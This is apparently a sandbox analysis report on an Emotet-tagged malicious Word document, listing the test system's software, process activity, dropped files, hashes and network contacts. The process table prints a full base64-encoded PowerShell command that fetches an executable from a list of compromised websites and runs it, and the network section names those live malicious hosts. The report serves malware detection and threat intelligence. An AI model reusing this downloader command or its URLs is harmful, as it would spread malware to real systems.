Malware analysis REP-20201015-B10855.zip Malicious activity

Add for printing

File name:	REP-20201015-B10855.zip
Full analysis:	https://app.any.run/tasks/e565ac3b-af32-45dc-9c9c-8f0457a873f3
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	October 19, 2020, 20:24:59
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	emotet-doc emotet loader
Indicators:
MIME:	application/zip
File info:	Zip archive data, at least v5.1 to extract
MD5:	DC95A1A9107A53231EC70BD6C6F319FE
SHA1:	4F3C1021B09D9DF29529DED725AD35D5A56994F9
SHA256:	6B992BC263A77A5E0B88BD628AC596DBF3129282D7D2C23A9B615CCFC1E495C2
SSDEEP:	1536:voMpZMDEbNxI3vgaP2HcJ6UcQEGAVo3yTW2Q:vTMDEbNIjP2HcJUdo3yTZQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.17843 KB3058515
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)
srvpost (2.12.72)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Hyphenation Parent Package English
IE Spelling Parent Package English
IE Troubleshooters Package
InternetExplorer Optional Package
InternetExplorer Package TopLevel
KB2533623
KB2534111
KB2639308
KB2729094
KB2731771
KB2786081
KB2834140
KB2882822
KB2888049
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
PlatformUpdate Win7 SRV08R2 Package TopLevel
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Drops known malicious document
  - WinRAR.exe (PID: 2488)
- Application was dropped or rewritten from another process
  - KBDBR.exe (PID: 2664)
  - V9ofyxp.exe (PID: 2224)
SUSPICIOUS
- Starts Microsoft Office Application
  - WinRAR.exe (PID: 2488)
- Executable content was dropped or overwritten
  - POwersheLL.exe (PID: 2356)
  - V9ofyxp.exe (PID: 2224)
- Executed via WMI
  - POwersheLL.exe (PID: 2356)
- Creates files in the user directory
  - POwersheLL.exe (PID: 2356)
- PowerShell script executed
  - POwersheLL.exe (PID: 2356)
- Starts itself from another location
  - V9ofyxp.exe (PID: 2224)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 980)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 980)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.zip	\|	ZIP compressed archive (100)

EXIF

ZIP

ZipFileName:	REP-20201015-B10855.doc
ZipUncompressedSize:	136178
ZipCompressedSize:	65258
ZipCRC:	0x65a9b282
ZipModifyDate:	2020:10:15 00:57:01
ZipCompression:	Unknown (99)
ZipBitFlag:	0x0003
ZipRequiredVersion:	51

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
2488	"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\REP-20201015-B10855.zip"	C:\Program Files\WinRAR\WinRAR.exe	—	explorer.exe
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0
980	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\REP-20201015-B10855.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	WinRAR.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2356	POwersheLL -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAHIATwBGAGkATABlAFwAQgAyADAARABZAGEAawBcAG8AdgBQAFEASABvADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBJAHQAYABZAHAAYABSAE8AVABgAG8AYwBPAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACkAKwAnACAAJwArACcAdABsACcAKwAnAHMAMQAnACsAKAAnADEALAAgAHQAbAAnACsAJwBzACcAKQApADsAJABDAHUANgB5AGgAMQB6ACAAPQAgACgAJwBWACcAKwAoACcAOQBvAGYAJwArACcAeQAnACkAKwAnAHgAcAAnACkAOwAkAEgAcQBkAHcAbABqAGkAPQAoACcARwBiACcAKwAoACcANAAnACsAJwB1ADAAMQAnACkAKwAnAHMAJwApADsAJABIAHcAegBxADgAeAAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AEIAMgAwACcAKwAnAGQAeQAnACsAJwBhACcAKwAnAGsAewAwAH0ATwB2AHAAcQBoAG8ANAB7ADAAfQAnACkAIAAgAC0ARgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKwAkAEMAdQA2AHkAaAAxAHoAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABVAHQAYgBrAGwAaQA2AD0AKAAnAEcAJwArACgAJwBhAHcAJwArACcAagBhAHkAJwApACsAJwBsACcAKQA7ACQAQQBjAGwAegBiADcANgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAUQB0ADkAYgB3AGUAcQA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAnACkAKwAoACcALwBuACcAKwAnAGUAJwApACsAKAAnAHcAJwArACcAYwBhACcAKQArACcAcgAnACsAKAAnAHQAdQByAGsAaQAnACsAJwB5ACcAKwAnAGUALgBjACcAKwAnAG8AbQAvAHcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBTAGIAcAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvAC8AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBsAGkAJwArACcAYQBuAHcAbQBpAG4AYQAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAJwArACcAcAAtACcAKQArACcAaQAnACsAKAAnAG4AYwAnACsAJwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcAWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AaABiAG0AJwArACcAbwBuAHQAJwApACsAJwBlACcAKwAnAC4AYwAnACsAJwBvACcAKwAnAG0ALwAnACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwB3ACcAKwAnAGUAJwArACcAcgAnACsAKAAnAC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAJwApACsAKAAnAGgAZQAnACsAJwB3AGEAawAnACsAJwBlAHMAJwApACsAKAAnAHQAdQAnACsAJwBkAGkAJwApACsAJwBvAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4ALwAnACsAJwAzAEQAJwArACgAJwAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwADoAJwArACcALwAnACsAJwAvAGYAJwArACcAbwByACcAKwAoACcAbQAnACsAJwBlAGQAYgB5AG0AZQAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAHcAcAAnACsAJwAtAGMAbwBuAHQAJwApACsAKAAnAGUAJwArACcAbgB0ACcAKQArACcALwAzACcAKwAoACcAZQAvACoAaAAnACsAJwB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAvACcAKwAnAC8AdQAnACkAKwAoACcAbgBpAHQAJwArACcAZQAnACkAKwAnAGQAdwAnACsAKAAnAGEAeQAnACsAJwAuACcAKQArACgAJwBnAGkAdgBpACcAKwAnAG4AZwAuACcAKwAnAGEAZwAnACkAKwAoACcAZQBuACcAKwAnAGMAJwApACsAJwB5ACcAKwAnAC8AcwAnACsAJwB5ACcAKwAoACcAcwAtACcAKwAnAGMAYQBjACcAKQArACcAaABlACcAKwAnAC8AJwArACcAWAAnACsAJwBuACcAKwAoACcAVAAnACsAJwAvACcAKwAnACoAaAB0AHQAcAA6ACcAKQArACcALwAvACcAKwAnAHAAJwArACcAYQByACcAKwAoACcAdABuACcAKwAnAGUAcgBzAC4AcgAnACkAKwAoACcAaQBwACcAKwAnAHAAbABlACcAKQArACgAJwBhAGwAcABoACcAKwAnAGEALgBjAG8AJwApACsAKAAnAG0ALwBkACcAKwAnAGEAJwArACcAdABhAC8AJwApACsAKAAnAHUAJwArACcAbAB0AGkAbQAnACkAKwAoACcAYQB0AGUAbQBlAG0AYgAnACsAJwBlACcAKwAnAHIALwBMACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AYwBhAHYAcAA4ADMAKQA7ACQATAA1ADMANQB6AG0AZQA9ACgAKAAnAEQAcwAnACsAJwAzAHUAZQAnACkAKwAnADMAJwArACcAcAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFADEAMwBqAGUAdwBzACAAaQBuACAAJABRAHQAOQBiAHcAZQBxACkAewB0AHIAeQB7ACQAQQBjAGwAegBiADcANgAuACIAZABgAE8AVwBuAEwAbwBBAGQAYABGAGkAYABMAGUAIgAoACQARQAxADMAagBlAHcAcwAsACAAJABIAHcAegBxADgAeAAxACkAOwAkAEwAZQBtAGYAdgBmADQAPQAoACgAJwBQAHEAbQAnACsAJwBrACcAKQArACcAeAAnACsAJwAwAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAdwB6AHEAOAB4ADEAKQAuACIAbABlAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADMAMgAwADcANAApACAAewAmACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABIAHcAegBxADgAeAAxACkAOwAkAFAAZQBlADAAegB2AHEAPQAoACcARwAnACsAKAAnAGYANABxAGsAJwArACcAdABzACcAKQApADsAYgByAGUAYQBrADsAJABNADUANwBsAGcAdwBrAD0AKAAnAFMAJwArACgAJwBpAGoAJwArACcAYQA1ACcAKwAnAGYAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQA2AHMAeABrAGYAMgA9ACgAKAAnAFgAMwBsAGEAXwAnACsAJwB3ACcAKQArACcAbAAnACkA	C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2224	"C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe"	C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe		POwersheLL.exe
User: admin Integrity Level: MEDIUM Description: CWebUpdatePrj MFC Application Exit code: 0 Version: 1, 0, 0, 1
2664	"C:\Users\admin\AppData\Local\mmc\KBDBR.exe"	C:\Users\admin\AppData\Local\mmc\KBDBR.exe	—	V9ofyxp.exe
User: admin Integrity Level: MEDIUM Description: CWebUpdatePrj MFC Application Version: 1, 0, 0, 1

Add for printing

Total events

2 823

Read events

1 931

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
980	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR6EBC.tmp.cvr		—
		MD5:—	SHA256:—
2356	POwersheLL.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MVEZXJC78Y9RPTH7VZE9.temp		—
		MD5:—	SHA256:—
2356	POwersheLL.exe	C:\Users\admin\B20dyak\Ovpqho4\V9ofyxp.exe		—
		MD5:—	SHA256:—
2356	POwersheLL.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2d79e8.TMP		binary
		MD5:D6EE8C34E4C28999F00E385C8808E7DE	SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2488	WinRAR.exe	C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\REP-20201015-B10855.doc		document
		MD5:8EDA538E640B07BD409212750F9B5162	SHA256:81D7FAF2D7827159CA55256325F29B7BCDB803AFD06F0955AE13D9C6D359DD16
2224	V9ofyxp.exe	C:\Users\admin\AppData\Local\mmc\KBDBR.exe		executable
		MD5:7C1316251B466712BED86B62248851B9	SHA256:8829F7BB7464E79E622B61A8EC124AE5A8B7163429C0DEA4B7FEF621E6EE5007
980	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Rar$DIb2488.45207\~$P-20201015-B10855.doc		pgc
		MD5:2BCE4B949BDFDF03168F4461F87FD52A	SHA256:CEE13A5399A352783E2279B4E655BB5EECCDEE09D2E9EB1A9C0C37B6EB479DC2
2356	POwersheLL.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:D6EE8C34E4C28999F00E385C8808E7DE	SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
980	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:A36F9EE544CBC950B964261846B3771B	SHA256:47CC8750D5982ABE42E243A3CEE79C1E2D1341891DB88A1054F6E440980CB7FD
980	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd		tlb
		MD5:144D727D3907E88E95D9DE6708F7FAB6	SHA256:3E73FD8434B1A8B7816D0249E35265D0211F8F3BFD38086E613C1981A031F422

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2356	POwersheLL.exe	GET	301	85.95.231.40:80	http://newcarturkiye.com/wp-admin/Sbp/	TR	—	—	malicious
2356	POwersheLL.exe	GET	404	85.95.231.40:80	http://www.newcarturkiye.com/wp-admin/Sbp/	TR	html	9.23 Kb	malicious
2356	POwersheLL.exe	GET	404	68.66.197.96:80	http://hbmonte.com/wp-content/wer/	US	html	25.8 Kb	suspicious
2356	POwersheLL.exe	GET	200	148.72.217.145:80	http://thewakestudio.com/wp-admin/3D/	US	executable	339 Kb	suspicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2356	POwersheLL.exe	85.95.231.40:80	newcarturkiye.com	Inetmar internet Hizmetleri San. Tic. Ltd. Sti	TR	malicious
2356	POwersheLL.exe	68.66.197.96:80	hbmonte.com	A2 Hosting, Inc.	US	suspicious
2356	POwersheLL.exe	104.27.165.223:80	lilianwmina.com	Cloudflare Inc	US	shared
2356	POwersheLL.exe	148.72.217.145:80	thewakestudio.com	—	US	suspicious

DNS requests

Domain	IP	Reputation
newcarturkiye.com	85.95.231.40	malicious
www.newcarturkiye.com	85.95.231.40	malicious
lilianwmina.com	104.27.165.223 172.67.165.199 104.27.164.223	suspicious
hbmonte.com	68.66.197.96	suspicious
thewakestudio.com	148.72.217.145	suspicious

Threats

